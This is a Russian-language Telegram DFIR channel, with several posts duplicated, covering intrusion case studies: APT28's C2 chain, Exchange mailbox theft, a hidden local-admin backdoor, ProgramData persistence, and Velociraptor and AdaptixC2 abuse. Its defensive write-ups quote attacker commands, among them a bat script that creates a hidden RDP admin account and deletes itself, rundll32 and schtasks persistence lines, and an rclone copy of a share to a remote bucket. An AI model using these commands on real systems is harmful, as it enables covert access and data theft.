Forwarded from Threat Hunting Father 🦔
Sekoia.io рапортует об интересной цепочке APT28
APT28 в 2025 использует гибрид open-source + легитимные облачные сервисы для скрытого C2: старт — weaponized Office (Signal ⟶ макросы) → COM-hijack DLL (prnfldr.dll) → извлечение shellcode из PNG (стеганография) → запуск .NET Grunt HTTP Stager (Covenant) → Koofr как C2 (C2Bridge) → последующие модули (PlaySndSrv.dll + sample-03.wav) декриптят и ставят BeardShell (icedrive C2). Параллельно обнаружен SlimAgent (keylogger/screenshots). Технично, стабильно, хитро — используют regsvr32 / COM hijack, PNG LSB-стеганографию, в-памяти загрузку .NET, ChaCha20-Poly1305 для BeardShell.
Стега в 2025 👀👀👀
Интересные техники, к прочтению:
🔗 https://blog.sekoia.io/apt28-operation-phantom-net-voxel/
🦔 THF
APT28 в 2025 использует гибрид open-source + легитимные облачные сервисы для скрытого C2: старт — weaponized Office (Signal ⟶ макросы) → COM-hijack DLL (prnfldr.dll) → извлечение shellcode из PNG (стеганография) → запуск .NET Grunt HTTP Stager (Covenant) → Koofr как C2 (C2Bridge) → последующие модули (PlaySndSrv.dll + sample-03.wav) декриптят и ставят BeardShell (icedrive C2). Параллельно обнаружен SlimAgent (keylogger/screenshots). Технично, стабильно, хитро — используют regsvr32 / COM hijack, PNG LSB-стеганографию, в-памяти загрузку .NET, ChaCha20-Poly1305 для BeardShell.
Стега в 2025 👀👀👀
Интересные техники, к прочтению:
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥1 1 1
Ну, получается, выступил! 😮💨
Всем спасибо, кто пришел послушать из подписчиков, и тем, кто подписался после доклада.😽
Эксклюзивно для вас я подготовлю мини-райтап того, что я рассказал на конференции.
Ждите🔥
Всем спасибо, кто пришел послушать из подписчиков, и тем, кто подписался после доклада.
Эксклюзивно для вас я подготовлю мини-райтап того, что я рассказал на конференции.
Ждите
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21❤2👍2🫡2 1 1
Так, мини-каникулы после конфы позади - запускаю серию ежедневных небольших райтапиков по самым вкусным и интересным моментам из доклада. 🕺
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 1)💀
***Все написанное - плод больного воображения автора!
В первую очередь хочу зафиксировать тейк: удобство для админа = преимущество для злоумышленника. В расследованиях снова и снова всплывают исключения и времянки, которые когда-то запитчили менеджменту ради скорости. Увы, эти «удобства» потом прилетают по полной инфре😢
Сегментация как шутка😾
На бумаге при проектировании было три зоны: пользовательская, сервисная и доменная. В реале - одна большая плоская сеть. Определены «коридоры доверия» через легитные SMB/RPC/WMI/WinRM и межзонные NTLM-логоны. Для АКТОРа это уже не хак, а поездка по прямым рельсам: Domain -> Service -> User.
⚠️ Fuckup: Mail server = HQ
В этой инфре Exchange перестал быть просто почтовиком и превратился в оперативный штаб злоумышленников. Почему так вышло:
1. В типовых директориях лежали .aspx вебшеллы, которые ловили запросы извне и исполняли команды на стороне клиента:
2. В журналах видно скрытые инстансы PowerShell (в журналах Exchange [EID 1] и PwShClassic [EID 400]):
3. Псевдо-«WindowsUpdate» в планировщике задач:
Эта штука тащила в автозапуск📝
👀 Вкратце, что делал скрипт:
- сохранял дату на сетевую шару;
- выдавал супер-админу роль на экспорт почты;
- читал список почтовых ящиков из C:\Users\public\documents\2.txt;
- по каждому создавал New-MailboxExportRequest;
- складывал PST в \\share\...\temp\<mailbox>.pst;
- по завершении удалял экспорт-запросы, чтобы не светиться.
Итог простой: почтовик = тихий C2 и лутбокс. Админские «времянки» и плоская сеть превращают инфраструктуру в трассу для актора.🙂
До завтра!
🐦⬛ DFIR Father
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 1)
***Все написанное - плод больного воображения автора!
В первую очередь хочу зафиксировать тейк: удобство для админа = преимущество для злоумышленника. В расследованиях снова и снова всплывают исключения и времянки, которые когда-то запитчили менеджменту ради скорости. Увы, эти «удобства» потом прилетают по полной инфре
Сегментация как шутка
На бумаге при проектировании было три зоны: пользовательская, сервисная и доменная. В реале - одна большая плоская сеть. Определены «коридоры доверия» через легитные SMB/RPC/WMI/WinRM и межзонные NTLM-логоны. Для АКТОРа это уже не хак, а поездка по прямым рельсам: Domain -> Service -> User.
В этой инфре Exchange перестал быть просто почтовиком и превратился в оперативный штаб злоумышленников. Почему так вышло:
1. В типовых директориях лежали .aspx вебшеллы, которые ловили запросы извне и исполняли команды на стороне клиента:
C:\inetpub\wwwroot\owa\auth\*.aspx
C:\inetpub\wwwroot\aspnet_client\*.aspx
2. В журналах видно скрытые инстансы PowerShell (в журналах Exchange [EID 1] и PwShClassic [EID 400]):
powershell.exe -noni -nop -w hidden -c "<cmd>"
3. Псевдо-«WindowsUpdate» в планировщике задач:
C:\Windows\System32\Tasks\WindowsUpdateЭта штука тащила в автозапуск
GetPst.ps1, который собирал пачки PST и скидывал их на шару (сам скрипт - на скрине). - сохранял дату на сетевую шару;
- выдавал супер-админу роль на экспорт почты;
- читал список почтовых ящиков из C:\Users\public\documents\2.txt;
- по каждому создавал New-MailboxExportRequest;
- складывал PST в \\share\...\temp\<mailbox>.pst;
- по завершении удалял экспорт-запросы, чтобы не светиться.
Итог простой: почтовик = тихий C2 и лутбокс. Админские «времянки» и плоская сеть превращают инфраструктуру в трассу для актора.
До завтра!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6❤5 2 1
Продолжаем! Сегодня поведаю о похожем, но не менее интересном приеме злоумышленников.🤓
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 2)💀
***Все написанное - плод больного воображения автора!
Важный тейк на сегодня: удобство для админа часто превращается в запасной ключ для злоумышленника. Кикнули актора из AD — он все равно вернется по RDP, если у вас открыт черный ход на локалках!
⚠️ Fuckup: Local Backdoor as “Plan B”
Акторы держат запасной путь через скрытую локальную учетку и пару тихих политик. Доменные креды сгорели? Не страшно — локальная дверь осталась открыта.
🔍 Какие артефакты я видел на диске:
C:\ProgramData\Microsoft\QuickHeal\123.bat — неприметный батник, который все делает за них.
Что он делает под капотом?😁
- Добавляет скрытого Administrator$ в группу пользователей RDP:
- Прячет учетку от UI через реестр (hidden=0):
- Выдает полный админ-токен в ремоут-сессиях:
- Делает учетку бессрочной:
- И финт ушами — самоудаление:🤔
Почему это больно?🥺
Потому что учетки локальных админов разрешены и почти не мониторятся. Что уж говорить о незаметных правках политик по типу RDP или фильтрации токенов, которые тонут среди всей рутины. Ну и для актора ничего не поменялось, потому что когда доменную дверь закрыли —> локальная осталась открыта.
👀 DFIR-наброски для себя
Смотрим членство в локальных группах, свежие задачи в планировщике, ключи UserList и LocalAccountTokenFilterPolicy, таймлайн создания Administrator$ и запусков cmd/pwsh рядом. Если почистили домен, но кто-то продолжает логиниться по RDP — ищите такой «план Б».
До завтра!
🐦⬛ DFIR Father
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 2)
***Все написанное - плод больного воображения автора!
Важный тейк на сегодня: удобство для админа часто превращается в запасной ключ для злоумышленника. Кикнули актора из AD — он все равно вернется по RDP, если у вас открыт черный ход на локалках!
Акторы держат запасной путь через скрытую локальную учетку и пару тихих политик. Доменные креды сгорели? Не страшно — локальная дверь осталась открыта.
C:\ProgramData\Microsoft\QuickHeal\123.bat — неприметный батник, который все делает за них.
Что он делает под капотом?
- Добавляет скрытого Administrator$ в группу пользователей RDP:
net localgroup "Пользователи удаленного рабочего стола" Administrator$ /add
- Прячет учетку от UI через реестр (hidden=0):
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
- Выдает полный админ-токен в ремоут-сессиях:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy=1
- Делает учетку бессрочной:
net user Administrator$ /expires:never
- И финт ушами — самоудаление:
del %0
Почему это больно?
Потому что учетки локальных админов разрешены и почти не мониторятся. Что уж говорить о незаметных правках политик по типу RDP или фильтрации токенов, которые тонут среди всей рутины. Ну и для актора ничего не поменялось, потому что когда доменную дверь закрыли —> локальная осталась открыта.
Смотрим членство в локальных группах, свежие задачи в планировщике, ключи UserList и LocalAccountTokenFilterPolicy, таймлайн создания Administrator$ и запусков cmd/pwsh рядом. Если почистили домен, но кто-то продолжает логиниться по RDP — ищите такой «план Б».
До завтра!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥1 1 1
Возвращаемся к разбору факапов и техник злоумышленников!
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 3)💀
***Все написанное - плод больного воображения автора!
Сегодняшний важный тейк📌
Актору не нужны зиродеи, если вы закрыли глаза на C:\ProgramData.
Персистенс тут не баг, а бизнес-модель — положили стартовый набор в места, куда админы регулярно пишут, и он живет как родной.
⚠️ Fuckup: Persistence on Autopilot
Если ProgramData доступен для записи и у админов нет жестких бэйслайнов, закрепление превращается в рутину. Патчей может быть сколько угодно — но пока базовые директории и процессы не поставлены под контроль, атакующие будут возвращаться снова и снова.
Факт. Акторы жили в системных путях и ProgramData, пряча свои компоненты под нейтральными именами. Их стартер-пак —это сервисы, запланированные задачи, Run-ключи и многостадийные вредоносы в ProgramData.😱
👀 Почему это плохо
• Рутинные админ-операции = persistence by design.
• ProgramData — отличная площадка для различного рода залетной малвари.
• Нейтральные имена и папки типа Microsoft* или Windows* тонут в системном шуме.
• Нет жестких ограничений — недоверенный код работает как доверенный.
Какие артефакты я видел при исследовании:
Парадокс в том, что это часто не выглядит как малварь - а как админская рутина: подписанный exe в ProgramData, таск в Microsoft\Windows, PowerShell-скрипт, запущенный админом. Для расследования это гадко, легитимность мешает увидеть зло.👿
🔍 Что глянуть в первую очередь:
• Сервисы с binPath в C:\ProgramData:
• Нестандартные задачи в Task Scheduler (TN в Microsoft\Windows с ProgramData).
• Исполняемые файлы в ProgramData или в других типовых директориях + проверка подписи (Get-AuthenticodeSignature).
• Логи запуска PowerShell с особым вниманием на
Итог. Патчи важны, но иногда персистенс нужно просто вырезать из практики — поменять регламенты, ограничить запись в ProgramData, ввести белые списки сервисов и контроль тасков. Если для админов это станет обычной рутиной, то как минимум для актора лишней головной болью.😠
🐦⬛ DFIR Father
Fck-upology of the Infrastructure: Mistakes That Build an Attack (Part 3)
***Все написанное - плод больного воображения автора!
Сегодняшний важный тейк
Актору не нужны зиродеи, если вы закрыли глаза на C:\ProgramData.
Персистенс тут не баг, а бизнес-модель — положили стартовый набор в места, куда админы регулярно пишут, и он живет как родной.
Если ProgramData доступен для записи и у админов нет жестких бэйслайнов, закрепление превращается в рутину. Патчей может быть сколько угодно — но пока базовые директории и процессы не поставлены под контроль, атакующие будут возвращаться снова и снова.
Факт. Акторы жили в системных путях и ProgramData, пряча свои компоненты под нейтральными именами. Их стартер-пак —это сервисы, запланированные задачи, Run-ключи и многостадийные вредоносы в ProgramData.
• Рутинные админ-операции = persistence by design.
• ProgramData — отличная площадка для различного рода залетной малвари.
• Нейтральные имена и папки типа Microsoft* или Windows* тонут в системном шуме.
• Нет жестких ограничений — недоверенный код работает как доверенный.
Какие артефакты я видел при исследовании:
• sc create WinUpdateSvc binPath= "C:\ProgramData\Microsoft\googleup.exe …
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\programdata\microsoft\MF\GetPst.ps1
• C:\ProgramData\Microsoft\MF\procdump64.exe
• C:\Windows\Microsoft.net\Framework64\v4.0.30319\MicrosoftServerManager.exe
Парадокс в том, что это часто не выглядит как малварь - а как админская рутина: подписанный exe в ProgramData, таск в Microsoft\Windows, PowerShell-скрипт, запущенный админом. Для расследования это гадко, легитимность мешает увидеть зло.
• Сервисы с binPath в C:\ProgramData:
Get-WmiObject Win32_Service | Where { $_.PathName -like "*ProgramData*" }• Нестандартные задачи в Task Scheduler (TN в Microsoft\Windows с ProgramData).
• Исполняемые файлы в ProgramData или в других типовых директориях + проверка подписи (Get-AuthenticodeSignature).
• Логи запуска PowerShell с особым вниманием на
-ExecutionPolicy Bypass/-WindowStyle Hidden.Итог. Патчи важны, но иногда персистенс нужно просто вырезать из практики — поменять регламенты, ограничить запись в ProgramData, ввести белые списки сервисов и контроль тасков. Если для админов это станет обычной рутиной, то как минимум для актора лишней головной болью.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👀2❤1 1
Forwarded from Threat Hunting Father 🦔
AmCache.hve — один из ключевых forensic-артефактов Windows, фиксирующий метаданные о бинарях: путь, размер, версию, SHA-1 (до 31 MB), PE-LinkDate, Publisher и др. Его ценность в том, что даже удалённые или модифицированные файлы оставляют следы, а сами записи сложно подделать или стереть.
Основные forensic-ключи AmCache
• InventoryApplicationFile — все исполняемые файлы: путь, имя, версия, SHA-1, PE-LinkDate. Позволяет находить удалённые утилиты (пример: winscp.exe в Downloads).
• InventoryApplication — сведения об установленных приложениях: InstallDate, MSI-метаданные, UninstallString. Хорошо палит удалённый AnyDesk.
• InventoryDriverBinary — загруженные драйверы: хэш, путь, подпись, LastModified. Используется для ловли уязвимых/вредоносных драйверов (см. LOLDrivers, AV Killer).
• InventoryApplicationShortcut — .lnk-файлы (путь и цель), полезно для подтверждения использования стёртых приложений.
SHA-1 хранится только по первым ~31 MB бинаря → большие малвари не хэшируются полностью.
Не всё = факт запуска: часть записей фиксирует только присутствие файла.
Kaspersky
фильтрация по дате (--start/--end),
поиск по ключевым словам (--search),
экспорт в CSV/JSON,
автоматический поиск “suspicious” бинарей (scvhost.exe, 1.exe, случайные hex-имена),
фильтры по Publisher (--missing-publisher) и системным компонентам (--exclude-os),
интеграция с VirusTotal и Kaspersky OpenTIP (--vt, --opentip).
Поиск удалённых бинарей (инсайдер использовал winscp.exe).
Фиксация временной установки AnyDesk для RMM.
Корреляция драйверов для выявления BYOVD и persistence.
Проверка ярлыков для подтверждения запуска софта.
AmCache ≠ “история запусков”, но это must-have артефакт DFIR, особенно в связке с Prefetch, ShimCache и event-логами. Правильный парсинг + TI-lookup → IOC-генерация, восстановление таймлайна, обнаружение удалённых утилит и драйверов.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2🔥1
The DFIR Report!
Один клик по налоговой форме "W-9" — и у тебя в сети незаметный квартирант почти на два месяца.
Актор зашел через социалку. Жертва открывает сильно обфусцированный JS Form_W-9_…js, скрипт молча тянет MSI.msi с хоста и через легитимный rundll32 подхватывает DLL-ку — следующий этап уже Brute Ratel и цепочка инъекций. Дальше следует буквально пошаговая экспансия: loader → badger → инъекция в системные процессы → снаффер/стилер.
Дальше — Latrodectus в explorer.exe, BackConnect/VNC для живого просмотра файлов и аплоада дополнительного инструментария, а затем поиск "сокровищ": браузерные профили, дампы LSASS, и внимание — unattend.xml с plain-text админ-кредами, найденный на третьи сутки.
Один файл — и у них доменный админ в кармане. Что-то мне это напоминает...
Когда они стянули доменного админа, у акторов буквально загорелись глаза:
runas / Secondary Logon для получения токенов, развёртывание Cobalt Strike (первые файлы — cron801.dl_ → позже system.dl_, запуск через rundll32 cron801.dl_,lvQkzdrFdILT) и массовое lateral-движение через PsExec / RDP на DC, файло- и backup-серверы.
Пара процессов, которые облегчают распознавание цепочки: rundll32 → explorer.exe(инжект) → sihost.exe (инжект Cobalt) → gpupdate.exe (run as Domain Admin) → spoolsv.exe (инжект).
• MSI внутри .cab-файлика с upfilles.dll и кастомным shellcode/RC4 развёртывателем Brute Ratel; wscadminui.dll появится позже как заменитель badger’а.
• .NET-бэкдор lsassa.exe, который кладет в ресурс зашифрованный пэйлоуд, ставит запланнированный таск и стучиться к C2 каждые ~250 секунд.
# стартовая команда из кейса
cmd.exe /K chcp 65001 && c: && cd c:\
# Brute Ratel / Cobalt запускают через rundll32
rundll32 wscadminui.dll, wsca
rundll32 cron801.dl_,lvQkzdrFdILT
# scheduled task от lsassa.exe
schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc onstart
# rclone (переименованный бинарь) - типичный пример
"C:\Windows\Temp\sihosts.exe" rclone copy "C:\share" remote:bucket --config "C:\Users\Public\rclone.conf"
Что лично цепляет в этом кейсе:
1. Начало — не фишинг-послание с явным приколом, а псевдолегит-JS, замаскированный под W-9, с тонкой обфускацией (много комментов/филлеров). Это рвет большинство "сигнатурных" детектов, если не делать deobf/JS-энжин-хантинг.
2. Использование легитимных бинарей Windows (rundll32, schtasks) + популярных админ-утилит (PsExec, RDP) = blend-in поведение. Т.е. вор крадёт под видом штатных операций.
3. И самый факапный факап — unattend.xml как слабое звено. Если автоматизированные деплой-файлы хранятся с плейн-текстом админок, это почти гарантированный disaster при наличии начального доступа.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5 2🔥1
Windows Persistence Map v0.1.jpg
2.8 MB
Сегодня расскажу вам о базной базе — закреплении в системе, aka persistence.
Почему это важно?📝
Потому что без закрепления злоумышленник — родственник проездом. Сбросил сессию, и до свидания! А вот если он прописался в автозагрузке, службе, драйвере или даже в кодеке — готовься, это уже "долгосрочная аренда"👎
На постере — классная карта от Florian Thiele: все способы закрепа в Windows в одном месте. От старых добрых Run-ключей до хитрых Winlogon-хуков и LSA Providers. Короче, если хочешь знать, где может жить злоумышленник — это твоя топографическая карта ада.😈
🔍 Как всё это проверять:
• На живом хосте: юзай Autoruns от Sysinternals. Видно всё, от автозагрузки до драйверов.
• Если у тебя мертвый диск: бери uVS (Universal Virus Sniffer), старичок, но всё видит.
• В дампе памяти: в бой идёт Volatility3 с кастомным плагином autorun (ссыль на гитхаб приложу). Очень удобно, кстати))
🌚 Совет: если видишь странный таск с cmd /c powershell -exec bypass, или DLL в AppData — не думай долго, копай глубже.
Persistence — это не след, это подпись жильца. А жильцы бывают разные.🥴
🔗 https://how2itsec.blogspot.com/2025/03/windows-persistence-map-v01.html
🔗 https://github.com/PXS-LU-CSIRT/volatility3-autoruns
🐦⬛ DFIR Father
Почему это важно?
Потому что без закрепления злоумышленник — родственник проездом. Сбросил сессию, и до свидания! А вот если он прописался в автозагрузке, службе, драйвере или даже в кодеке — готовься, это уже "долгосрочная аренда"
На постере — классная карта от Florian Thiele: все способы закрепа в Windows в одном месте. От старых добрых Run-ключей до хитрых Winlogon-хуков и LSA Providers. Короче, если хочешь знать, где может жить злоумышленник — это твоя топографическая карта ада.
• На живом хосте: юзай Autoruns от Sysinternals. Видно всё, от автозагрузки до драйверов.
• Если у тебя мертвый диск: бери uVS (Universal Virus Sniffer), старичок, но всё видит.
• В дампе памяти: в бой идёт Volatility3 с кастомным плагином autorun (ссыль на гитхаб приложу). Очень удобно, кстати))
Persistence — это не след, это подпись жильца. А жильцы бывают разные.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4 4🔥2
Forwarded from Threat Hunting Father 🦔
Сisco Talos подтвердили: операторы ransomware используют Velociraptor как «тихий RMM/оркестратор» внутри сети жертвы
В Talos-кейсах злоумышленники ставили старый Velociraptor 0.73.4.0, уязвимый к CVE-2025-6264 (эскалация через артефакт Admin.Client.UpdateClientConfig при наличии прав COLLECT_CLIENT → произвольные команды/захват агента). Исправления опубликованы в ветке ≥ 0.74.3 — обновляйтесь.
- Проверьте, что все серверы/агенты Velociraptor — ваши; «левых» инсталляций быть не должно.
- Запретите исполнение неподписанных бинарей Velociraptor; официальные билды Rapid7 — подписаны.
- Алерты на новые службы/таски с velociraptor.exe и исходящие к портам :8000 / :8001 / :8889; при сомнениях — ротируйте API/Auth-ключи.
- При первом старте создаётся источник EventLog Velociraptor:
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor — mtime ≈ первый запуск.
- Каждый запуск пишет в Application Event ID 1000 с ARGV (--config, client.config.yaml, service run). Это ловит внезапные установки/рестарты и нестандартные аргументы.
- Если бинарь пересобрали и вырезали IOCs — он, как правило, без подписи Rapid7 → ловите политиками/EDR.
- Используйте готовые YARA (уникальные строки Velociraptor) и экспериментальное Sigma для детекта нестандартных путей/аргументов/unsigned.
- Обновите сервер/агентов до ≥ 0.74.3 (CVE-2025-6264), перевыпустите «Golden» клиент и перепроверьте client.config.yaml (сервер, сертификаты, политики).
- Блокируйте подозрительные MSI-загрузки (Blob/msiexec /q /i https://...), мониторьте Impacket/Smbexec-паттерны.
- Контролируйте GPO-правки, отключающие RTP/Behavior Monitoring/“monitor file & program activity” — это немедленный инцидент.
- Следите за доступом к vSphere и созданием/синком админ-аккаунтов в Entra ID.
- Охотьтесь на fileless PowerShell-шифратор и скрипт эксфильтрации (тихий режим + паузы).
- Если у вас уже развёрнут Velociraptor — используйте артефакт Velociraptor Inception (Rapid7 Labs) для поиска несанкционированных инстансов.
- Ограничьте доступ к «опасным» артефактам через required_permissions, не раздавайте широкие роли (ARTIFACT_WRITER) «кому попало», верифицируйте артефакты перед публикацией (artifacts verify)
Rapid7 отдельно подчёркивает: это злоупотребление легит-инструментом, а не баг в продукте. Но без базовой гигиены вы рискуете потерять контроль над агентами и превратиться в C2-точку для APT/криминала. Включите детекты из их гайда (в т.ч. Sigma/YARA) и проведите экспресс-аудит прямо сегодня.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6 4🗿1
Когда исследование превращается в боевую игрушку - одни выкладывают PoC, другие - уже катают это в реальных кампаниях. 👿
🤓 Началось всё с обычного ISO - на вид ничего криминального, но внутри прятался обфусцированный шеллкод. Механика старая, но рабочая: DLL-sideloading - легитимный процесс подхватывает "чужую" DLL, та разворачивает payload и инжектит код в RuntimeBroker.exe. Это именно тот сценарий, о котором пишут в статье.
Авторы разобрали ISO, расшифровали XOR-обфускацию и описали, как код оживает в памяти. По сути - нормальная исследовательская работа: показать, как метод работает и какие артефакты остаются после исполнения.
Дальше - самое неприятное.🚬
Проект с исходниками (DLL + отладочный EXE) попал в публичный репозиторий, и рядом с исходниками остались PDB-метки вроде OneDriveUpdaterSideloading. Эти метки - мелочь, но для кого-то достаточно, чтобы собрать тот же бинарь и использовать его в реальной атаке.
Не прошло и много времени, собранный из репо DLL практически идентичен тому, что потом нашли "в поле". Разница - символическая: в XOR-ключ добавили букву "s" и все, логика осталась та же.
😰 То есть взяли PoC, слегка поправили и запустили.
Ещё момент - инструментарий. В одних инцидентах исследователи/атаки шли через BruteRatel, в других - через Cobalt Strike. Суть не в тулзе, а суть в том, что рабочая техника - готовая деталь, которую можно вставлять в любой C2-набор.
Авторы в материале показывают скриншоты декодирования шеллкода, сравнение версий DLL/EXE и описание того, как из "учебного" репо получается боевой бинарь. Там же есть упоминания про наблюдаемые IP и гибкие C2-профили - пример конкретного "маячка" в тексте: 193.37.x[.]x. Это не художественный вымысел - это реальные следы, которые складываются в картинку.🙂
☄️ Вывод простой и немного жесткий: публикация рабочего PoC с метаданными - это подарок для того, кто умеет быстро собрать и адаптировать. Исследование должно помогать защитникам, а не давать готовые рецепты для злоумышленников.
Если коротко - учись, показывай результат, но думай, что выкладываешь в паблик: PDB-строки, готовые бинарники и явные инструкции облегчают превращение исследования в оружие. И да, эта история - как раз про то, что один коммит может иметь далекоидущие последствия.🤫
🔗 https://www.ctfiot.com/134357.html
🐦⬛ DFIR Father
Авторы разобрали ISO, расшифровали XOR-обфускацию и описали, как код оживает в памяти. По сути - нормальная исследовательская работа: показать, как метод работает и какие артефакты остаются после исполнения.
Дальше - самое неприятное.
Проект с исходниками (DLL + отладочный EXE) попал в публичный репозиторий, и рядом с исходниками остались PDB-метки вроде OneDriveUpdaterSideloading. Эти метки - мелочь, но для кого-то достаточно, чтобы собрать тот же бинарь и использовать его в реальной атаке.
Не прошло и много времени, собранный из репо DLL практически идентичен тому, что потом нашли "в поле". Разница - символическая: в XOR-ключ добавили букву "s" и все, логика осталась та же.
Ещё момент - инструментарий. В одних инцидентах исследователи/атаки шли через BruteRatel, в других - через Cobalt Strike. Суть не в тулзе, а суть в том, что рабочая техника - готовая деталь, которую можно вставлять в любой C2-набор.
Авторы в материале показывают скриншоты декодирования шеллкода, сравнение версий DLL/EXE и описание того, как из "учебного" репо получается боевой бинарь. Там же есть упоминания про наблюдаемые IP и гибкие C2-профили - пример конкретного "маячка" в тексте: 193.37.x[.]x. Это не художественный вымысел - это реальные следы, которые складываются в картинку.
Если коротко - учись, показывай результат, но думай, что выкладываешь в паблик: PDB-строки, готовые бинарники и явные инструкции облегчают превращение исследования в оружие. И да, эта история - как раз про то, что один коммит может иметь далекоидущие последствия.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥4 3 1
Forwarded from s0ld13r ch. (s0ld13r)
И снова стилеры, и снова здравствуйте 😃
Исследуя логи стилеров и ULP, можно наткнуться на интересную строчку malware_path (в частности в API сервиса Hudsonrock), как можно понять из названия это поле где находился вредонос на атакованном хосте🫢
Эту фичу можно выгодно использовать для Threat Hunting: часто файлы подкидывают в предсказуемые места и можно обогатить hunting queries. В нашем случае - стандартный .NET-путь.🥺
🛡 Query
Больше про использование данных с теневых ресурсов можно почитать тут
🧢 s0ld13r
Исследуя логи стилеров и ULP, можно наткнуться на интересную строчку malware_path (в частности в API сервиса Hudsonrock), как можно понять из названия это поле где находился вредонос на атакованном хосте
Эту фичу можно выгодно использовать для Threat Hunting: часто файлы подкидывают в предсказуемые места и можно обогатить hunting queries. В нашем случае - стандартный .NET-путь.
event.code: 11 and file.path: *Microsoft.NET\\Framework\\v4.0.30319* and file.extension: exe
Больше про использование данных с теневых ресурсов можно почитать тут
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍4
Forwarded from README.hta
Давеча в одном из кейсов встретили постэксплуатационный фреймворк AdaptixC2. Что-то новенькое itw!
Кратко накину контекст, я думаю, вы поймете, почему:
adrecon, sharphound →
fscan →
rdp, psexec, obfuscated powershell, winrm →
cobalt strike →
RMM (AnyDesk, RMS, Mesh Agent, TacticalRMM) →
nuget, devtunnel, chisel →
adaptixc2 via nssm →
dll w/ telegram c2 channel →
sliver
Все приправлено кастомным шифровальщиком через GPO. И это даже не очередной экземпляр LockBit 🏴
Самое интересное — здесь: https://habr.com/ru/companies/angarasecurity/articles/962088/
Кратко накину контекст, я думаю, вы поймете, почему:
proxyshell → adrecon, sharphound →
fscan →
rdp, psexec, obfuscated powershell, winrm →
cobalt strike →
RMM (AnyDesk, RMS, Mesh Agent, TacticalRMM) →
nuget, devtunnel, chisel →
adaptixc2 via nssm →
dll w/ telegram c2 channel →
sliver
Все приправлено кастомным шифровальщиком через GPO. И это даже не очередной экземпляр LockBit 🏴
Самое интересное — здесь: https://habr.com/ru/companies/angarasecurity/articles/962088/
Хабр
Не Cobalt Strike и не Brute Ratel: почему злоумышленники выбрали AdaptixC2 и как его обнаружить
В сентябре 2025 года исследователи из Angara MTDR обнаружили, что фреймворк AdaptixC2 стал использоваться в атаках на организации в Российской Федерации. Сегодня мы, Лада Антипова и Александр...
❤5
Forwarded from SecuriXy.kz
CVE-2025-9491 (ZDI-CAN-25373) - Непатченная уязвимость Windows в активной эксплуатации (PlugX)
Суть уязвимости:
Критическая уязвимость в обработке Windows LNK файлов (ярлыков). Позволяет скрывать вредоносные аргументы командной строки в поле Target через добавление пробелов, делая их невидимыми в стандартном UI Windows.
История эксплуатации:
Активно используется APT группами из КНДР, Ирана, России, Китая с 2017 года
Публично раскрыта Trend Micro ZDI в марте 2025
Текущая кампания (сентябрь-октябрь 2025):
Атрибуция: UNC6384
Цели: дипломатические структуры ЕС (Венгрия, Бельгия, Италия, Нидерланды) и авиационные департаменты правительства Сербии
Вектор атаки:
Spearphishing с встроенным URL,
Доставка вредоносных LNK файлов (темы: встречи Еврокомиссии, семинары НАТО),
Запуск обфусцированных PowerShell команд, Многоступенчатая цепочка заражения,
Развертывание PlugX RAT через DLL side-loading легитимных утилит Canon
Позиция Microsoft :-)
Уязвимость зарегистрирована ZDI в сентябре 2024, Microsoft отказалась выпускать патч, считая что не соответствует критериям обслуживания
Предлагаемая защита: Microsoft Defender + Smart App Control и возможно исправление в будущих feature релизах
Индикаторы компрометации:
LNK файлы с аномально длинным Target полем
DLL side-loading через cnmpaui.exe, cnmpauix.exe, cnmplog.dat
HTA файлы с загрузкой JS с CloudFront URL
Инфраструктура C2 на базе CloudFront
Рекомендации:
Блокировка LNK файлов на периметре
Мониторинг аномальных запусков PowerShell через LNK
Контроль DLL side-loading легитимных процессов
Анализ исходящих подключений к CloudFront CDN
https://github.com/advisories/GHSA-6rf6-f9qg-8v94
Суть уязвимости:
Критическая уязвимость в обработке Windows LNK файлов (ярлыков). Позволяет скрывать вредоносные аргументы командной строки в поле Target через добавление пробелов, делая их невидимыми в стандартном UI Windows.
История эксплуатации:
Активно используется APT группами из КНДР, Ирана, России, Китая с 2017 года
Публично раскрыта Trend Micro ZDI в марте 2025
Текущая кампания (сентябрь-октябрь 2025):
Атрибуция: UNC6384
Цели: дипломатические структуры ЕС (Венгрия, Бельгия, Италия, Нидерланды) и авиационные департаменты правительства Сербии
Вектор атаки:
Spearphishing с встроенным URL,
Доставка вредоносных LNK файлов (темы: встречи Еврокомиссии, семинары НАТО),
Запуск обфусцированных PowerShell команд, Многоступенчатая цепочка заражения,
Развертывание PlugX RAT через DLL side-loading легитимных утилит Canon
Позиция Microsoft :-)
Уязвимость зарегистрирована ZDI в сентябре 2024, Microsoft отказалась выпускать патч, считая что не соответствует критериям обслуживания
Предлагаемая защита: Microsoft Defender + Smart App Control и возможно исправление в будущих feature релизах
Индикаторы компрометации:
LNK файлы с аномально длинным Target полем
DLL side-loading через cnmpaui.exe, cnmpauix.exe, cnmplog.dat
HTA файлы с загрузкой JS с CloudFront URL
Инфраструктура C2 на базе CloudFront
Рекомендации:
Блокировка LNK файлов на периметре
Мониторинг аномальных запусков PowerShell через LNK
Контроль DLL side-loading легитимных процессов
Анализ исходящих подключений к CloudFront CDN
